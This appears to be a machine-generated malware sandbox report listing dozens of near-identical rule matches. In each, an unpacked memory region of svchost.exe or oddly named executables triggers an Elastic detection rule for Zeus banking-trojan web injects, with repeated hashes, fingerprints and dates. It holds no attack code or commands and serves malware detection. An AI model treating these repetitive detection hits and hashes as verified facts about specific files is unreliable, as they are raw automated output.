Source: 2.3.svchost.exe.f280000.43.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.29.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 20.2.nPtwtzGyOdAtB.exe.13a2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.29f3c00.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.44.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.48.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.37.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.nPtwtzGyOdAtB.exe.1012000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.43.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 10.2.nPtwtzGyOdAtB.exe.3210000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 35.2.nPtwtzGyOdAtB.exe.f70000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 35.2.nPtwtzGyOdAtB.exe.f12000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.27.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.29a2000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.nPtwtzGyOdAtB.exe.2ab2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.5830000.17.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.35.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.23.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.nPtwtzGyOdAtB.exe.2a52000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.19.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 10.2.nPtwtzGyOdAtB.exe.3072000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.39.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 38.2.nPtwtzGyOdAtB.exe.2c02000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.16.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 15.2.nPtwtzGyOdAtB.exe.2e20000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.40.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.41.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.WlCVLbzNph.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.31.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.nPtwtzGyOdAtB.exe.2ab2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.26.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.41.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.nPtwtzGyOdAtB.exe.1322000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.nPtwtzGyOdAtB.exe.1410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 10.2.nPtwtzGyOdAtB.exe.3072000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.ed00000.18.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.15.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.39.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.4200000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.WlCVLbzNph.exe.407000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
